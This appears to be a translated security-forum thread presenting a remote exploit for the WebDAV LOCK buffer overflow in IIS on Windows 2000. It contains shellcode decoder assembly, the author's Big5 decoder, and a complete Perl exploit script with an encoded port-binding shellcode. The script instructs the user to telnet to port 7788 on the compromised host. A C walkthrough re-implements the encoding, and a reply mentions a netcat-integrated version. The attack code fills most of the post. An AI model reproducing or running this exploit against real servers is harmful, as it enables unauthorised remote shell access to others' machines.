Author: hacker521 [hacker521]
A supplement to ISNO's method for the WebDAV vulnerability
Author: Nanika

First of all I must thank ISNO for his guidance and yuange (袁哥) for his article. Here is a report of what my research turned up.

ISNO's method is good: he puts the real port-binding shellcode at the very end,

    print $socket "LOCK /$bf$ret$decode$sc$buf HTTP/1.1\r\n";
    print $socket "Host: $host\r\n";
    print $socket "Content-Type: text/xml\r\n";
    print $socket "Content-length: 808\r\n\r\n";
    print $socket "$tag$shell\r\n";

and then uses the encoding yuange described in http://www.nsfocus.net/index.php?act=sec_self&do=view&doc_id=646 to encode this routine written by ISNO:

            add esi, 1000h
            jmp loadmem
    lookupN:
            add esi, 4000h
    loadmem:
            mov eax, [esi]
            cmp eax, 4e4e4e4eh      ; search memory for NNNN first, to speed up the search
            jnz lookupN
            add esi, 4
    lookupYXYX:
            mov al, byte ptr [esi]
            inc esi
            cmp al, 59h             ; then search for YXYX, which we put in front of the shellcode as a locator
            jnz lookupYXYX
            mov al, byte ptr [esi]
            inc esi
            cmp al, 58h
            jnz lookupYXYX
            lodsw
            cmp ax, 0x5859
            jnz lookupYXYX
            jmp esi                 ; once found, jump to the shellcode

But we still need a decoding routine. This is yuange's assembly for decoding the shellcode:

    void shellcodefnlock()
    {
        _asm{
            nop
            nop
            nop
            nop
            nop
            nop
            nop
            nop
    unlockdataw:
            nop
            push ebx            /* push esp can be used instead */
            pop esi
    loopload:
            lodsw
            cmp ax,0x6099       // SHELLDATA
            jnz loopload
            push esi
            push esi
            push esi
            pop edi
    looplock:
            lodsw
            cmp ax,NOPCODE
            jz toshell
            nop
            sub al,DATABASE
            nop
            push eax
            pop ecx
            lodsw
            nop
            sub al,DATABASE
            lea edx,dword ptr [eax+ecx*4+0x70]
            lea edx,dword ptr [edx+ecx*4-0x70]
            lea edx,dword ptr [edx+ecx*4+0x70]
            lea edx,dword ptr [edx+ecx*4-0x70]
            push edx
            pop eax
            /* the inverse of
                   temp=shellcodefnadd[j];
                   buff[OVERADD+offset+2*j]=DATABASE+temp/0x10;
                   buff[OVERADD+offset+2*j+1]=DATABASE+temp%0x10;
               but here in double-byte form, i.e. 0xa*0x10+0xb=0xab;
               it is this convoluted to stay within the allowed instruction byte range */
            stosb
            jz looplock
            jnz looplock
            nop
    toshell:
            pop eax
            push eax
            push eax
            push eax
            ret
            nop
            _emit(0x99)
            _emit(0x60)
            _emit(0x0)
            _emit(0x0)
            _emit(0x0)
            _emit(0x0)
            NOP
            NOP
            NOP
            NOP
            NOP
            NOP
            NOP
            NOP
        }
    }

However, in my tests I found that this routine cannot be used as-is on the Traditional Chinese version: many characters cannot be decoded correctly. So I spent a lot of time writing a decoder for the Traditional Chinese version:

    _Nanikalock2:
    00421B9C 53             push ebx
    00421B9D 5E             pop esi
    00421B9E 90             nop
    00421B9F 66 AD          lods word ptr [esi]
    00421BA1 EB 01          jmp _Nanikalock2+8 (00421ba4)
    00421BA3 90             nop
    00421BA4 90             nop
    00421BA5 66 3D 58 59    cmp ax,offset _Nanikalock2+0Bh (00421ba7)   ; immediate is 5958h, the "XY" marker
    00421BA9 75 F4          jne _Nanikalock2+3 (00421b9f)
    00421BAB 90             nop
    00421BAC 56             push esi
    00421BAD 5F             pop edi                                       ; decoded bytes are stored in place, from here
    00421BAE 90             nop
    00421BAF 66 AD          lods word ptr [esi]
    00421BB1 EB 01          jmp _Nanikalock2+18h (00421bb4)
    00421BB3 90             nop
    00421BB4 90             nop
    00421BB5 66 3D 4F 00    cmp ax,offset _Nanikalock2+1Bh (00421bb7)   ; immediate is 004Fh: an "O" word ends decoding
    00421BB9 74 3C          je _Nanikalock2+5Bh (00421bf7)
    00421BBB 90             nop
    00421BBC 2C 61          sub al,61h                                    ; first char 'a'..'p' -> high nibble
    00421BBE 50             push eax
    00421BBF 59             pop ecx
    00421BC0 90             nop
    00421BC1 66 AD          lods word ptr [esi]
    00421BC3 EB 01          jmp _Nanikalock2+2Ah (00421bc6)
    00421BC5 90             nop
    00421BC6 2C 61          sub al,61h                                    ; second char -> low nibble
    00421BC8 50             push eax
    00421BC9 5A             pop edx
    00421BCA 8D 54 8A 70    lea edx,[edx+ecx*4+70h]                       ; the four lea compute edx = low + 16*high
    00421BCE 8D 54 8A 90    lea edx,[edx+ecx*4-70h]
    00421BD2 8D 54 8A 70    lea edx,[edx+ecx*4+70h]
    00421BD6 8D 54 8A 90    lea edx,[edx+ecx*4-70h]
    00421BDA 52             push edx
    00421BDB 58             pop eax
    00421BDC AA             stos byte ptr [edi]
    00421BDD 51             push ecx
    00421BDE 90             nop
    00421BDF 59             pop ecx
    00421BE0 90             nop
    00421BE1 90             nop
    00421BE2 90             nop
    00421BE3 90             nop
    00421BE4 90             nop
    00421BE5 74 C8          je _Nanikalock2+13h (00421baf)
    00421BE7 EB C6          jmp _Nanikalock2+13h (00421baf)
    00421BE9 EB 01          jmp _Nanikalock2+50h (00421bec)
    00421BEB 90             nop
    00421BEC 90             nop
    00421BED 90             nop
    00421BEE 90             nop
    00421BEF 90             nop
    00421BF0 90             nop
    00421BF1 90             nop
    00421BF2 90             nop
    00421BF3 90             nop
    00421BF4 90             nop
    00421BF5 90             nop
    00421BF6 90             nop
    00421BF7 90             nop
    00421BF8 90             nop
    00421BF9 EB 05          jmp _Nanikalock2+64h (00421c00)
    00421BFB 90             nop
    00421BFC 90             nop
    00421BFD 90             nop
    00421BFE 58             pop eax                                       ; 58 59 = "XY": the marker word itself
    00421BFF 59             pop ecx

This routine uses the idea yuange wrote up. In my tests, on Traditional Chinese as well as Simplified Chinese, the routine that searches for the SHELLCODE can also be left out: we can encode the cmd-binding shellcode directly with yuange's encoding and build it right after the decoder. See the exploit at the end for details.

I feel that none of the exploits everyone has released so far can be made to work universally; the reasons are the differing encoding schemes, the difficulty of locating the SHELLCODE, and so on. I am only a beginner; I wrote this hoping to get the ball rolling, so that the experts here can work out an exploitation method that works across all versions.

Exploit for the Traditional Chinese version:

    #!/usr/bin/perl
    # use call ebx as the ret
    # test on Chinese Big5 Win2k sp3
    # by Nanika@seed.net.tw minjack.tw@yahoo.com.tw
    # thanks isno, yuange
    use IO::Socket;

    if ($#ARGV < 1) { die "webdavx.pl IP offset\r\noffset: 0-7\r\n"; }
    $host   = $ARGV[0];
    $port   = 80;
    $offset = $ARGV[1];

    # decoder stub (_Nanikalock2 above), one %uXXXX per 16-bit word, low byte first
    $decode = "%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090".
              "%u5e53%u6690%uebad%u9001%u6690%u583d%u7559%u90f4".
              "%u5f56%u6690%uebad%u9001%u6690%u4f3d%u7400%u903c".
              "%u612c%u5950%u6690%uebad%u9001%u612c%u5a50%u548d".
              "%u708a%u548d%u908a%u548d%u708a%u548d%u908a%u5852".
              "%u51aa".
              # decoder code, 66 bytes
              "%u5990%u9090%u9090%u9090%u7490%uebc8%uebc6%u0590".
              "%u9090%u9090%u9090%u9090%u9090%u9090%ueb90%u9005".
              "%u5958";

    # bind shellcode encoded with yuange's scheme: two chars 'a'..'p' per byte
    $sc = "jaoladfnolafoipippppppidmfbfjajajailmfddmjggljbaadfaiadajheaocpk".
          "hoiojfjhjhmnbmenbehmjapngimepddgjhjhjhjhmhpdbolcjhjhjhjhkeemcmjh".
          "jhhhoahpeljgjhjhbggmjhjhgicijibefjjgjhjhbgfejhjhjgjhpbbgkmnkmnoc".
          "hakefhbmnekljefepbbgkpmhncoceobefhopbmkhjegebmnjjljefmbgkonmncmf".
          "njocfcbgoojdncnlkekfocclkegibmnblhjefebmfmjejpbgkonapcodmhocjobg".
          "oojdofpipengodjbnabefhjdhmhcjegijegmbmmbldjegnkeefpbbmiabmgnbmnb".
          "ihnpjegpkefobmfijefojefojenjiljefmbmkojegmhopojgjhjhmjbagabmeake".
          "fhgaehbmfpgfdibokfbknfjpmfmhmegiifmnbonfjdbkoficmfmbgimfjdmnkefh".
          "dlbdfhocgokefobnjjbdfoodjomfmbmegiifmndmhfhpnbmfmbgimfjdmnbmepke".
          "fhdlbdfhocgokefobnjjbhgojfodjomfmbmegiifmndmhfhakefhmhnhmhnhmhgi".
          "mahpaepnihmbmegimahlpnjfmegimaghkefhmamhchjldmmpdmnhdmminpmhmamb".
          "dkmbgimafhnpmhmadkmbdkmbgimafhnpchndbojamagimafdkefhbmnbgdbonakl".
          "bonanhbmjbbonakpkefhpbcpjgjgbonallmamakefhmhmhmhnhmhnpmhmhdkmbke".
          "fhmhgimafpgiobghgimaflgiobglgimaflnpmhmhmegimagdbmepkefhcdjdmhfg".
          "hpjdmhgimaedbmghkefhbmfpccjdmhmhmamgmbgioadpgimaehbekijgollfkefh".
          "mhmagikambgioadpgimaeljmfhodlikefhmhgikambmegimagppnmhgimahhhmfp".
          "kefhmhcdjdmhmbmegimaglmakefomgmhmbgioadlgimaeppnmhgimahhhmdnmhgi".
          "mahdhmgjmpmhbonfgffebmndldjljccpjhjhjhfajhopmbkdifkefhfehmhlhphf".
          "gkgigihpafgjgiginmmbhaoalebhhaoanlpipgpdnlpopfofpgofoongjhnmncmf".
          "njncnlkekfjhneofpcpgodpcmhpoohpcjhnapcodmeodpgofodocohnopjpbping".
          "jhneofpcpgodpcmhofpipepcoeoengjhneplpioepcnppgpjpdplpcjhmhpcpcpm".
          "njpgpkpcpdmhpoohpcjhnaplpipfpgplngplplpipejhmaofpoodpcnbpoplpcjh".
          "mfpcpgpdnbpoplpcjhmeplpcpcohjhncoppoodmhofpipepcoeoejhjhmamenine".
          "nmkekfjhoepipepmpcodjhpfpopjpdjhplpooeodpcpjjhpgpepepcohodjhoepc".
          "pjpdjhofpcpeobjhjfjhijpljhjhjhjhjhjhjhjhjhjhjhjhpepkpdljpcoppcjh".
          "gigigigi";
    # code to find the real shellcode, 1608 bytes

    $num = 266 + $offset;
    $bf  = "A" x $num;
    $ret = "%u6e53%ueb06%ueb06%u2191" x 8;   # call ebx addr 0x6e532191
    $n   = 63549;
    $buf = "O" x $n;                         # "O" words terminate the decoder loop
    $tag   = "YXYX";
    $shell = "AAAA";

    $socket = IO::Socket::INET->new(PeerAddr => $host,
                                    PeerPort => $port,
                                    Proto    => "tcp",
                                    Type     => SOCK_STREAM)
        or die "Couldn't connect: $!\n";

    print $socket "LOCK /$bf$ret$decode$sc$buf HTTP/1.1\r\n";
    print $socket "Host: $host\r\n";
    print $socket "Content-Type: text/xml\r\n";
    print $socket "Content-length: 8\r\n\r\n";
    print $socket "$tag$shell\r\n";

    print "send buffer...\r\n";
    print "telnet target 7788\r\n";
    print "if fail, try other offset(0-7)\r\n";
    print "test on Chinese Big5 Win2k sp3\r\n";
    print "by Nanika\@seed.net.tw minjack.tw\@yahoo.com.tw\r\n";
    print "thanks isno, yuange\r\n";
    close($socket);

If it fails, you can adjust the offset or change the call ebx address.
Original poster (地主), posted: 07/20 07:03
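The encoding and decoding the post describes, as an added example in C (this is not code from Nanika's post or from yuange's article, and the function and buffer names are mine): yuange's nibble encoder, the four-lea arithmetic, the %uXXXX packing used for $decode and $ret, and a model of the _Nanikalock2 loop run over a constructed buffer. The one assumption behind it is that the server stores each ASCII character of the URL as one little-endian 16-bit word (so lodsw returns al = character, ah = 0), which is what makes the 'a'..'p' characters and the "O" terminator line up as the decoder expects. The post reports that on the Traditional Chinese version some characters did not come through correctly; that failure is not modelled here.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DATABASE 0x61    /* 'a': nibble n is sent as the character 'a'+n, so 'a'..'p' */
#define MARK_XY  0x5958  /* the "XY" word the decoder scans for (sent as %u5958) */
#define MARK_END 0x004F  /* 'O' as a 16-bit word: ends decoding (the "O" x $n padding) */

/* yuange's encoder: buff[2j] = DATABASE + temp/0x10, buff[2j+1] = DATABASE + temp%0x10.
 * Writes 2*n characters and returns that count. */
size_t yuange_encode(const uint8_t *in, size_t n, char *out)
{
    for (size_t j = 0; j < n; j++) {
        out[2 * j]     = (char)(DATABASE + (in[j] >> 4));
        out[2 * j + 1] = (char)(DATABASE + (in[j] & 0x0F));
    }
    return 2 * n;
}

/* The decoder's four lea instructions with ecx = high nibble, edx = low nibble:
 * each adds ecx*4 and the +70h/-70h cancel in pairs, so edx = lo + 16*hi. */
uint32_t lea_chain(uint32_t ecx, uint32_t edx)
{
    edx = edx + ecx * 4 + 0x70;
    edx = edx + ecx * 4 - 0x70;
    edx = edx + ecx * 4 + 0x70;
    edx = edx + ecx * 4 - 0x70;
    return edx;
}

/* Bytes -> the %uXXXX form of the post: one 16-bit word per escape, low byte
 * first in memory, so bytes 53 5e become %u5e53. An odd trailing byte is paired
 * with a nop (0x90, my choice). Returns characters written, 0 on overflow. */
size_t pack_u_escapes(const uint8_t *bytes, size_t n, char *out, size_t outsz)
{
    size_t pos = 0;
    for (size_t i = 0; i < n; i += 2) {
        uint8_t lo = bytes[i], hi = (i + 1 < n) ? bytes[i + 1] : 0x90;
        int w = snprintf(out + pos, outsz - pos, "%%u%02x%02x", hi, lo);
        if (w < 0 || (size_t)w >= outsz - pos) return 0;
        pos += (size_t)w;
    }
    return pos;
}

static uint16_t lodsw(const uint8_t *mem, size_t *esi)
{
    uint16_t ax = (uint16_t)(mem[*esi] | (mem[*esi + 1] << 8));
    *esi += 2;
    return ax;
}

/* Model of _Nanikalock2 on a byte view of the converted request. start plays
 * the role of ebx, so the scan only matches words on start's 2-byte alignment,
 * as on the real stack. *out_off receives edi: the byte right after the XY
 * marker, where decoded bytes are stored in place. Returns bytes written. */
size_t nanika_decode(uint8_t *mem, size_t len, size_t start, size_t *out_off)
{
    size_t esi = start, edi, written = 0;
    uint16_t ax;
    do {                                            /* lodsw; cmp ax,5958h; jne */
        if (esi + 2 > len) return 0;
        ax = lodsw(mem, &esi);
    } while (ax != MARK_XY);
    edi = *out_off = esi;                           /* push esi; pop edi */
    for (;;) {
        if (esi + 2 > len) break;
        ax = lodsw(mem, &esi);
        if (ax == MARK_END) break;                  /* cmp ax,4Fh; je toshell */
        uint32_t ecx = (uint8_t)(ax - DATABASE);    /* sub al,61h; push eax; pop ecx (ah assumed 0) */
        if (esi + 2 > len) break;
        ax = lodsw(mem, &esi);
        uint32_t edx = (uint8_t)(ax - DATABASE);    /* sub al,61h; push eax; pop edx */
        mem[edi++] = (uint8_t)lea_chain(ecx, edx);  /* push edx; pop eax; stosb */
        written++;
    }
    return written;
}

/* Lay out what the decoder walks, one little-endian word per ASCII character:
 * filler, the XY marker word, the encoded payload, then "O" padding. */
size_t build_unicode_buffer(const char *enc, size_t enclen, uint8_t *mem, size_t memsz)
{
    static const char filler[] = "AAAAAAAA", pad[] = "OOOOOOOO";
    size_t pos = 0;
    if (2 * (strlen(filler) + 1 + enclen + strlen(pad)) > memsz) return 0;
    for (size_t i = 0; i < strlen(filler); i++) { mem[pos++] = (uint8_t)filler[i]; mem[pos++] = 0; }
    mem[pos++] = MARK_XY & 0xFF; mem[pos++] = MARK_XY >> 8;      /* bytes 58 59 */
    for (size_t i = 0; i < enclen; i++) { mem[pos++] = (uint8_t)enc[i]; mem[pos++] = 0; }
    for (size_t i = 0; i < strlen(pad); i++) { mem[pos++] = (uint8_t)pad[i]; mem[pos++] = 0; }
    return pos;
}

/* Encode, lay out, decode from offset 0 and compare. Returns 1 on success. */
int roundtrip(const uint8_t *payload, size_t n)
{
    char enc[512];
    uint8_t mem[1100];
    size_t out_off, enclen, len, got;
    if (n > 256) return 0;
    enclen = yuange_encode(payload, n, enc);
    len = build_unicode_buffer(enc, enclen, mem, sizeof mem);
    if (len == 0) return 0;
    got = nanika_decode(mem, len, 0, &out_off);
    return got == n && memcmp(mem + out_off, payload, n) == 0;
}

int main(void)
{
    /* Constructed sample (not the post's shellcode); its first four bytes are
     * what "jaoladfn", the start of the post's $sc, encodes under this scheme. */
    static const uint8_t sample[] = { 0x90, 0xeb, 0x03, 0x5d, 0x00, 0xff, 0x31, 0xc0 };
    char enc[2 * sizeof sample + 1] = {0}, esc[64];
    yuange_encode(sample, sizeof sample, enc);
    pack_u_escapes(sample, sizeof sample, esc, sizeof esc);
    printf("encoded: %s\n%%u form: %s\nroundtrip: %s\n", enc, esc,
           roundtrip(sample, sizeof sample) ? "ok" : "FAILED");
    return 0;
}
```

Because the scan reads whole words, a marker that sits on the other byte alignment from the one ebx starts on is never seen; that is the same alignment sensitivity the post's offset argument (0-7) works around, and `nanika_decode` reproduces it through its `start` parameter.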
Reply: junjuntop [junjuntop]
There is now a version with nc integrated; it is more convenient to use, and it is in Chinese too.
Floor B1, posted: 07/26 19:31
Copyright 20CN Network Security Group
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
Forum software written by: NetDemon
ICP filing: 粤ICP备05087286号